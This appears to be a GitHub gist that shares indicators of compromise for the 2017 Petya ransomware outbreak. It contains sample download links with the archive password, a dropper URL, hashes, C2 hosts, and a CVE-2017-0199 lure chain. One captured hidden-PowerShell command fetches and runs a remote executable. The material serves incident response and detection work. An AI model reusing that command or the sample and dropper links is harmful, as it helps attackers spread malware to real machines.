-
-
Save Sukelluskello/7abb067ddffab3ea55ab3d277029a5c7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
WannaCry2: Petya Ransomware attack. | |
Got new info? Email at isox@vulners.com | |
*********** Possible malware files: | |
https://yadi.sk/d/S0-ZhPY53KWc84 | |
https://yadi.sk/d/Zpkm88sp3KWc8v | |
Archive password: virus | |
*********** Malware dropped file: | |
http://185.165.29.78/~alex/svchost.exe | |
*********** Analysis: | |
https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/ | |
https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 | |
https://twitter.com/PolarToffee/status/879709615675641856 | |
*********** Hashes by codexgigas team: | |
For 185.165.29.78, we have: | |
a809a63bc5e31670ff117d838522dec433f74bee | |
bec678164cedea578a7aff4589018fa41551c27f | |
d5bf3f100e7dbcc434d7c58ebf64052329a60fc2 | |
aba7aa41057c8a6b184ba5776c20f7e8fc97c657 | |
0ff07caedad54c9b65e5873ac2d81b3126754aac | |
51eafbb626103765d3aedfd098b94d0e77de1196 | |
078de2dc59ce59f503c63bd61f1ef8353dc7cf5f | |
As droppers | |
And for 84.200.16.242: | |
7ca37b86f4acc702f108449c391dd2485b5ca18c | |
2bc182f04b935c7e358ed9c9e6df09ae6af47168 | |
1b83c00143a1bb2bf16b46c01f36d53fb66f82b5 | |
82920a2ad0138a2a8efc744ae5849c6dde6b435d | |
*********** Potential (IOC) | |
- - - - - - - - - - - - - - - - - - - - - - - - | |
File Name Order-20062017.doc (RTF із CVE-2017-0199) | |
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1 | |
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84 | |
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206 | |
File Size 6215 bytes | |
File Type Rich Text Format data | |
Connects to the host: | |
84.200.16.242 80 | |
h11p://84.200.16.242/myguy.xls | |
File Name myguy.xls | |
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25 | |
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73 | |
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6 | |
File Size 13893 bytes | |
File Type Zip archive data | |
mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324) | |
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;) | |
10807.exe %APPDATA%\10807.exe" " (PID: 3096) | |
File Name BCA9D6.exe | |
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A | |
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060 | |
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD | |
File Size 275968 bytes | |
Connects to the host: | |
111.90.139.247 80 | |
COFFEINOFFICE.XYZ 80 | |
Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment